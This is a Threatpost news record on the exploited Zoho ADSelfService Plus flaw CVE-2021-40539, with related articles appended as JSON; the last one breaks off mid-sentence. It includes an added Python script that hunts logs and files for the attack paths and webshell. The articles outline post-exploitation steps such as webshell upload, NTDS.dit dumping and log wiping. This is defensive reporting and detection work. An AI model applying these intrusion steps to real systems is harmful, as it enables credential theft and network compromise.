ID THREATPOST:705B9DD7E8602B9F2F913955E25C2550 Type threatpost Reporter Tara Seals Modified 2021-09-09T12:58:48
Description
A critical security vulnerability in the Zoho ManageEngine ADSelfService Plus platform could allow remote attackers to bypass authentication and have free rein across users’ Active Directory (AD) and cloud accounts.
The issue (CVE-2021-40539) has been actively exploited in the wild as a zero-day, according to the Cybersecurity and Infrastructure Security Agency (CISA).
Zoho issued a patch on Tuesday, and CISA warned that admins should not only apply it immediately, but also ensure in general that ADSelfService Plus is not directly accessible from the internet. The issue affects builds 6113 and below (the fixed version is 6114).
Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) solution for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application which can act as a convenient point-of-entry to areas deep inside an enterprise’s footprint, for users and attackers alike.
“Ultimately, this underscores the threat posed to internet-facing applications,” Matt Dahl, principal intelligence analyst for CrowdStrike, noted. “These don’t always get the same attention as exploit docs with decoy content, but the variety of these web-facing services gives actors lots of options.”
This isn’t Zoho’s first zero-day rodeo. In March 2020, researchers disclosed a zero-day vulnerability in Zoho’s ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones and more from a central location. The critical bug (CVE-2020-10189, with a CVSS score of 9.8) allowed an unauthenticated, remote attacker to gain complete control over affected systems – “basically the worst it gets,” researchers said at the time.
Authentication Bypass and RCE
The issue at hand is an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus, which could lead to remote code execution (RCE), according to Zoho’s knowledge-base advisory.
“This vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request,” according to the firm. “This would allow the attacker to carry out subsequent attacks resulting in RCE.”
Echoing CISA’s assessment, Zoho also noted that “We are noticing indications of this vulnerability being exploited.” The firm characterized the issue as “critical”; at the time of writing no CVSS severity score had been calculated for the bug (NVD has since assigned CVE-2021-40539 a CVSS 3.1 base score of 9.8, critical).
Further technical details are for now scant (and no public exploit code appears to be making the rounds — yet), but Dahl noted that the zero-day attacks have been going on for quite some time:
> Observed exploitation of this vuln before CVE-2021-26084 (Atlassian Confluence) which got a lot of attention last week. Some very general observations:
>
> 1/ <https://t.co/rIfxxeBlmO>
>
> — Matt Dahl (@voodoodahl1) September 8, 2021
However, he said that the attacks have thus far been highly targeted and limited, and possibly the work of a single (unknown, for now) actor.
“Actor(s) appeared to have a clear objective with ability to get in and get out quickly,” he tweeted.
He also noted similarities to the attacks on Atlassian Confluence instances (CVE-2021-26084), which also started out as limited and targeted. In that case, however, researchers were able to “rapidly produce” a PoC exploit, he pointed out, and exploitation eventually proliferated to multiple actors, including targeted-intrusion groups, and on to cryptomining activity (as seen in the recent Jenkins attack).
Atlassian Confluence, a collaboration platform where business teams organize their work in one place, is, like ADSelfService Plus, a centralized gateway to a raft of sensitive corporate information.
How to Know if Zoho ADSelfService Plus Has Been Exploited
Zoho’s advisory tells admins to check the \ManageEngine\ADSelfService Plus\logs folder for access log entries containing either of the following strings, which are the REST API paths the bypass is exercised against:
/RestAPI/LogonCustomization
/RestAPI/Connection
Zoho also said that an installation that has been exploited will contain the following files, which are dropped by the attacker and are not part of a clean install:
service.cer in the \ManageEngine\ADSelfService Plus\bin folder
ReportGenerate.jsp in the \ManageEngine\ADSelfService Plus\help\admin-guide\Reports folder
Either finding is an indicator of compromise, not merely of a vulnerable build: upgrading to build 6114 closes the bypass but does not remove a webshell that is already in place or revoke credentials an attacker has already taken, so a hit should trigger incident response rather than just a patch.
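As an added example (not Zoho’s tooling and not part of the original article), the following Python script automates the two checks above and also watches for the webshell URL that the later FBI/CISA/CGCYBER advisory reports for the same bug. The REST API paths and file names are the ones Zoho and the agencies published; the Tomcat/Apache-style access-log line format, the sample log lines and the throwaway install tree are constructed assumptions.

```python
"""Hunt for CVE-2021-40539 exploitation artifacts on an ADSelfService Plus host.

Added example, not Zoho's or CISA's tooling. Two checks:
  1. access-log lines whose request path is one of the suspect URLs;
  2. presence of the files Zoho says exist only on an exploited install.
"""
import posixpath
import re
import tempfile
from pathlib import Path
from typing import Dict, Iterable, List

# REST API paths from Zoho's advisory, plus the webshell URL named in the
# FBI/CISA/CGCYBER joint advisory (AA21-259A).
SUSPECT_PATHS = {
    "/RestAPI/LogonCustomization",
    "/RestAPI/Connection",
    "/help/admin-guide/Reports/ReportGenerate.jsp",
}
_SUSPECT_LOWER = {p.lower() for p in SUSPECT_PATHS}

# Files Zoho lists as present only after exploitation, relative to the install root.
SUSPECT_FILES = (
    Path("bin", "service.cer"),
    Path("help", "admin-guide", "Reports", "ReportGenerate.jsp"),
)

# ASSUMPTION: access log lines follow the common Tomcat/Apache format
#   client - - [timestamp] "METHOD /path?query HTTP/1.1" status bytes
ACCESS_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalise_path(target: str) -> str:
    """Strip the query string and collapse '//', '/./' and '/../' segments so a
    path-mangled request still compares equal to the canonical suspect URL."""
    path = target.split("?", 1)[0]
    path = re.sub(r"/+", "/", path)
    return posixpath.normpath(path)


def scan_access_log(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return one finding per request whose normalised path is a suspect URL."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = ACCESS_LINE.match(line)
        if not m:
            continue  # unparsed line; a real hunt should count and report these too
        path = normalise_path(m.group("target"))
        if path.lower() in _SUSPECT_LOWER:
            findings.append({
                "line": lineno,
                "client": m.group("client"),
                "time": m.group("ts"),
                "method": m.group("method"),
                "path": path,
                "status": int(m.group("status")),
            })
    return findings


def check_install(root: Path) -> List[str]:
    """Return the suspect files (as install-relative POSIX paths) present under root."""
    return [f.as_posix() for f in SUSPECT_FILES if (root / f).is_file()]


# Constructed sample log; 203.0.113.42 is a documentation address, not a real IOC.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Sep/2021:09:14:02 +0000] "GET /authorization.do HTTP/1.1" 200 5123
10.0.0.5 - - [06/Sep/2021:09:14:03 +0000] "GET /images/logo.png HTTP/1.1" 200 4410
203.0.113.42 - - [06/Sep/2021:09:15:31 +0000] "POST /./RestAPI/LogonCustomization HTTP/1.1" 200 712
203.0.113.42 - - [06/Sep/2021:09:15:33 +0000] "POST /RestAPI/Connection HTTP/1.1" 200 0
203.0.113.42 - - [06/Sep/2021:09:15:40 +0000] "GET /help/admin-guide/Reports/ReportGenerate.jsp HTTP/1.1" 200 88
10.0.0.9 - - [06/Sep/2021:09:16:00 +0000] "GET /authorization.do?lang=en HTTP/1.1" 200 5123
""".splitlines()


def demo_install_check(compromised: bool) -> List[str]:
    """Build a throwaway fake install tree (constructed; only the two suspect
    paths are modelled) and run check_install() against it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel in SUSPECT_FILES:
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            if compromised:
                (root / rel).write_text("placeholder")
        return check_install(root)


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['client']} {hit['method']} {hit['path']} -> {hit['status']}")
    print("dropped files on demo host:", demo_install_check(compromised=True))
```

Run it against the real logs folder by feeding each access log file to scan_access_log() and pointing check_install() at the product’s install root; the path normalisation is there so that a request written as /./RestAPI/Connection or with doubled slashes still matches, since exact string matching on the raw request line is easy to sidestep.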
{"threatpost": [{"lastseen": "2021-09-16T21:32:23", "description": "The FBI, CISA and the U.S. Coast Guard Cyber Command (CGCYBER) warned today that state-backed advanced persistent threat (APT) actors are likely among those who\u2019ve been actively exploiting a newly identified bug in a Zoho single sign-on and password management tool since early last month.\n\nAt issue is a critical authentication bypass vulnerability in Zoho ManageEngine ADSelfService Plus platform that can lead to remote code execution (RCE) and thus open the corporate doors to attackers who can run amok, with free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nThe Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) platform for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application which can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nLast Tuesday, [Zoho issued a patch](<http://cve-2021-40539>) \u2013 [Zoho ManageEngine ADSelfService Plus build 6114](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>) \u2013 for the flaw, which is tracked as [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) with a 9.8 severity rating. 
As the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) at the time, it was being actively exploited in the wild as a zero-day.\n\nAccording to today\u2019s [joint advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) from the three government cybersecurity arms \u2013 FBI, CISA and CGCYBER \u2013 the exploits pose \u201ca serious risk to critical infrastructure companies, U.S.-cleared defense contractors, academic institutions, and other entities that use the software.\u201d\n\nYou can see why: Successful exploitation of a lynchpin piece of security like a SSO and password handler could lay out a welcome mat for adversaries. Specifically, as the advisory iterated, an adversary could use the vulnerability to pry open security defenses in order to compromise admin credentials, move laterally through the network, and exfiltrate registry hives and AD files.\n\nThat\u2019s of concern to any business, but with Zoho, we\u2019re talking about a security solution that\u2019s used by critical infrastructure companies, U.S.-cleared defense contractors and academic institutions, among others.\n\nThe joint advisory said that APT groups have in fact targeted such entities in multiple industries, including transportation, IT, manufacturing, communications, logistics and finance.\n\n\u201cIllicitly obtained access and information may disrupt company operations and subvert U.S. research in multiple sectors,\u201d the advisory noted. 
\u201cSuccessful exploitation of the vulnerability allows an attacker to place webshells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.\u201d\n\n## Confirming Exploits May Be Tough\n\nSuccessful attacks have been uploading a .zip file containing a JavaServer Pages (JSP) webshell \u2013 accessible at /help/admin-guide/Reports/ReportGenerate.jsp \u2013 pretending to be an x509 certificate, service.cer. Next come requests to different API endpoints to further exploit the targeted system.\n\nThe next step in the exploit is lateral movement using Windows Management Instrumentation (WMI), gaining access to a domain controller, dumping of NTDS.dit and SECURITY/SYSTEM registry hives, and then, from there, further compromised access.\n\n\u201cConfirming a successful compromise of ManageEngine ADSelfService Plus may be difficult,\u201d the security agencies advised, given that the attackers are running clean-up scripts designed to rub out their tracks by removing traces of the initial point of compromise and by obscuring any relationship between the exploitation of CVE-2021-40539 and the webshell.\n\nThe advisory provided this laundry list of tactics, techniques and processes (TTP) being used by threat actors to exploit the vulnerability:\n\n * WMI for lateral movement and remote code execution (wmic.exe)\n * Using plaintext credentials acquired from compromised ADSelfService Plus host\n * Using pg_dump.exe to dump ManageEngine databases\n * Dumping NTDS.dit and SECURITY/SYSTEM/NTUSER registry hives\n * Exfiltration through webshells\n * Post-exploitation activity conducted with compromised U.S. 
infrastructure\n * Deleting specific, filtered log lines\n\n## Mitigations\n\nOrganizations that detect indicators of compromise (IoC) around their ManageEngine ADSelfService Plus installations \u201cshould take action immediately,\u201d the trio of agencies instructed.\n\n\u201cFBI, CISA, and CGCYBER strongly urge users and administrators to update to ADSelfService Plus build 6114,\u201d the trio stated. They also strongly urged organizations to keep ADSelfService Plus away from direct access via the internet.\n\nThey\u2019re also strongly recommending domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets \u201cif any indication is found that the NTDS.dit file was compromised.\u201d\n\n## This One Will Hurt\n\nJake Williams, co-founder and CTO at incident response firm BreachQuest, said that organizations should take note of the fact that threat actors have been using webshells as a post-exploitation payload. In the case of the exploitation of this Zoho flaw, they\u2019re using webshells disguised as certificates: something that security teams should be able to pick up on in web server logs, but \u201conly if organizations have a plan for detection.\u201d\n\nNo time like the present to start, he told Threatpost on Thursday: \u201cGiven that this will certainly not be the last vulnerability that results in web shell deployment, organizations are advised to baseline normal behavior in their web server logs so they can quickly discover when a web shell has been deployed.\u201d\n\nFinding a critical vulnerability in the system intended to help your employees manage and reset their passwords is \u201cexactly as bad as it sounds,\u201d noted Oliver Tavakoli, CTO at cybersecurity firm Vectra. \u201cEven if the ADSelfService Plus server was not accessible from the internet, it would be accessible from any compromised laptop. 
Recovery will be expensive \u2013 \u2018domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets\u2019 are certainly disruptive by themselves, and the APT groups may have established other means of persistence in the intervening time.\u201d\n\nThis ManageEngine vulnerability is the fifth instance of similarly critical vulnerabilities from ManageEngine this year, noted Sean Nikkel, senior cyber threat intel analyst at digital risk protection provider Digital Shadows. Unfortunately but predictably, given how much access attackers can get out of exploiting a vulnerability like this, we can likely expect more widespread exploitation of this and previous bugs, \u201cgiven the interactivity with Microsoft system processes.\u201d\n\nNikkel continued with yet another gloomy prediction: \u201cThe observation that APT groups are actively exploiting CVE-2021-40539 should highlight the potential exposure it might cause. If trends are consistent, extortion groups will likely seek exploitation for ransomware activity in the not-so-distant future,\u201d he mused.\n\nAll of which points to what CISA et al. have been urging about these vulnerabilities: namely, patch fast. 
\u201cUsers of Zoho\u2019s software should apply patches immediately to avoid the types of compromise described in the CISA bulletin,\u201d Nikkel said.\n\n## See Something, Say Something\n\nOrganizations should immediately report any of the following to [CISA](<https://us-cert.cisa.gov/report>) or the FBI:\n\n * Identification of IoC as outlined in the advisory.\n * Presence of webshell code on compromised ManageEngine ADSelfService Plus servers.\n * Unauthorized access to or use of accounts.\n * Evidence of lateral movement by malicious actors with access to compromised systems.\n * Other indicators of unauthorized access or compromise.\n\nHere are the reporting instructions:\n\n * Contact your local FBI field office at <https://www.fbi.gov/contact-us/field-offices>, or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, include the incident date, time and location; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n * To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.gov.\n * To report cyber incidents to the Coast Guard contact the USCG National Response Center (NRC). Phone: 1-800-424-8802, email: NRC@uscg.mil.\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! 
[**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-16T21:09:23", "type": "threatpost", "title": "CISA, FBI: State-Backed APTs Are Exploiting Critical Zoho Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-16T21:09:23", "id": "THREATPOST:1606F3DA3AAD368249E36D32FC2B8079", "href": "https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-10T12:44:24", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. 
Steven Seeley of Source Incite [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter on Thursday, along with a proof of concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of Desktop Central. The FileStorage class is used to read data from or write data to a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost that an attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o>\n> Exploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. 
Nate Warfield, a security researcher with Microsoft, pointed to [at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However, Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. 
Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. 
Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/?utm_source=rss&utm_medium=rss&utm_campaign=critical-zoho-zero-day-flaw-disclosed", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T14:12:34", "description": "A new campaign is prying apart a known security vulnerability in the Zoho ManageEngine ADSelfService Plus password manager, researchers warned over the weekend. 
The threat actors have managed to exploit the Zoho weakness in at least nine global entities across critical sectors so far (technology, defense, healthcare, energy and education), deploying the Godzilla webshell and exfiltrating data.\n\nOn Sunday, Palo Alto Networks\u2019 Unit 42 researchers [said](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>) that the targeted cyberespionage campaign is distinct from the ones that the FBI and [CISA warned about](<https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/>) in September.\n\nThe bug is a critical authentication bypass flaw \u2013 CVE-2021-40539 \u2013 that allows unauthenticated remote code execution (RCE). Zoho [patched](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) the vulnerability in September, but it\u2019s been actively exploited in the wild starting at least as early as August when it was a zero-day, opening the corporate doors to attackers who can run amok as they get free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nConsequences of a successful exploit can be significant: The Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) platform for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. 
It is, in other words, a powerful, highly privileged application that can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\nCISA\u2019s alert explained that in the earlier attacks, state-backed advanced persistent threats (APTs) were deploying a specific webshell and other techniques to maintain persistence in victim environments.\n\nNine days after the CISA alert, Unit 42 researchers saw yet another, unrelated campaign kick off starting on Sept. 17, as a different actor started scanning for unpatched servers. On Sept. 22, after five days of harvesting data on potential targets, exploitation attempts started up and likely continued into early October.\n\nUnit 42 researchers believe that the actor more or less indiscriminately targeted unpatched servers across the spectrum, from education to the Department of Defense, with scans of at least 370 Zoho ManageEngine servers in the U.S. alone.\n\n\u201cWhile we lack insight into the totality of organizations that were exploited during this campaign, we believe that, globally, at least nine entities across the technology, defense, healthcare, energy and education industries were compromised,\u201d they said.\n\n## Godzilla Webshell Does Some Heavy Lifting\n\nUnit 42 said that after threat actors exploited [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) to gain RCE, they quickly moved laterally to deploy several pieces of malware, relying particularly on the publicly available Godzilla webshell.\n\nThe actor uploaded several Godzilla variations to compromised servers and planted some new malware tools as well, including a custom Golang-based open-source backdoor called [NGLite](<https://github.com/Maka8ka/NGLite>) and a new credential-stealer that Unit 42 is tracking as KdcSponge.\n\n\u201cThe threat actors then used either the webshell or the NGLite payload to run commands and move laterally to other systems on 
the network, while they exfiltrated files of interest simply by downloading them from the web server,\u201d according to the analysis. After the actors pivoted to a domain controller, they installed the new KdcSponge stealer, which is designed to harvest usernames and passwords from domain controllers as accounts attempt to authenticate to the domain via Kerberos.\n\nBoth Godzilla and NGLite are written in Chinese and are free for the taking on GitHub.\n\n\u201cWe believe threat actors deployed these tools in combination as a form of redundancy to maintain access to high-interest networks,\u201d Unit 42 surmised. The researchers described Godzilla as something of a multi-function pocket knife of a webshell, noting that it \u201cparses inbound HTTP POST requests, decrypts the data with a secret key, executes decrypted content to carry out additional functionality and returns the result via a HTTP response.\u201d\n\nAs such, attackers can avoid placing code that\u2019s likely to be flagged as malicious on targeted systems until they\u2019re ready to dynamically execute it, researchers said.\n\n## Using NKN to Communicate Is an Eye-Opener\n\n\u201cNGLite is characterized by its author as an \u2018anonymous cross-platform remote control program based on blockchain technology,\u2019\u201d Unit 42 researchers Robert Falcone, Jeff White and Peter Renals explained. 
\u201cIt leverages New Kind of Network ([NKN](<https://nkn.org/>)) infrastructure for its command and control (C2) communications, which theoretically results in anonymity for its users.\u201d\n\nThe researchers noted that using NKN \u2013 a legitimate networking service that uses blockchain technology to support a decentralized network of peers \u2013 for a C2 channel is \u201cvery uncommon.\u201d\n\n\u201cWe have seen only 13 samples communicating with NKN altogether \u2013 nine NGLite samples and four related to a legitimate open-source utility called [Surge](<https://github.com/rule110-io/surge>) that uses NKN for file sharing.\u201d\n\n## Threat Actor Shares TTPs with Emissary Panda\n\nUnit 42 said the identity of the threat actor is unclear, but researchers saw [correlations in tactics and tooling](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>) between the attacker and Threat Group 3390 (aka [Emissary Panda](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>), APT27, Bronze Union and LuckyMouse), an APT that\u2019s been around since 2013 and which [is believed to operate from China](<https://threatpost.com/bronze-union-apt-updates-remote-access-trojans-in-fresh-wave-of-attacks/142219/>).\n\n\u201cSpecifically, as documented by SecureWorks in an article on a [previous TG-3390 operation](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>), we can see that TG-3390 similarly used web exploitation and another popular Chinese webshell called [ChinaChopper](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) for their initial footholds before leveraging legitimate stolen credentials for lateral movement and attacks on a domain controller,\u201d Unit 42 said. 
\u201cWhile the webshells and exploits differ, once the actors achieved access into the environment, we noted an overlap in some of their exfiltration tooling.\u201d\n\n110921 08:51 UPDATE: [Microsoft said](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) on Monday that it\u2019s attributing this campaign with high confidence to DEV-0322, a group operating out of China, \u201cbased on observed infrastructure, victimology, tactics, and procedures.\u201d\n\nMicrosoft\u2019s Threat Intelligence Center (MSTIC) has previously detected DEV-0322 taking part in attacks targeting the SolarWinds Serv-U software, which had a zero day \u2013 CVE-2021-35211, a remote memory escape \u2013 that SolarWinds [patched](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) in July.\n\nMSTIC researchers said that the attacks in this new round of attacks on the Zoho password manager are installing a custom IIS module. IIS, or Internet Information Services, is extensible web server software created by Microsoft for use with the Windows NT family.\n\nBesides the custom IIS module, DEV-0322 also deployed a trojan that MSTIC is calling Trojan:Win64/Zebracon that uses hardcoded credentials to make connections to suspected DEV-0322-compromised [Zimbra email servers](<https://threatpost.com/zimbra-server-bugs-email-plundering/168188/>).\n\nIn its Sept. 
16 alert, CISA recommended that organizations that spot indicators of compromise related to ManageEngine ADSelfService Plus should \u201ctake action immediately.\u201d\n\nAlso, CISA strongly recommended domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets, \u201cif any indication is found that the NTDS.dit file was compromised.\u201d\n\n## Classic Cyberespionage Targets: Healthcare and Energy\n\nIf the actor behind this second Zoho-focused campaign does turn out to be a Chinese APT, it won\u2019t be surprising, some said. Dave Klein, cyber evangelist and director at [Cymulate](<https://cymulate.com/>), pointed to the People\u2019s Republic of China (PRC) having a well-documented, continued interest in healthcare and energy infrastructure data.\n\nHe pointed to the [2015 breach](<https://threatpost.com/5-6-million-fingerprints-stolen-in-opm-hack/114784/>) of the U.S. Office of Personnel Management (OPM) as an example. The massive breach was overwhelmingly [attributed](<https://www.washingtonpost.com/world/national-security/chinese-hackers-breach-federal-governments-personnel-office/2015/06/04/889c0e52-0af7-11e5-95fd-d580f1c5d44e_story.html?hpid=z1>) to the PRC. It included exquisitely sensitive information, including millions of federal employees\u2019 fingerprints, Social Security numbers, dates of birth, employee performance records, employment history, employment benefits, resumes, school transcripts, military service documentation and psychological data from interviews conducted by background investigators.\n\n\u201cThe PRC got into clearance background information data including very sensitive information. 
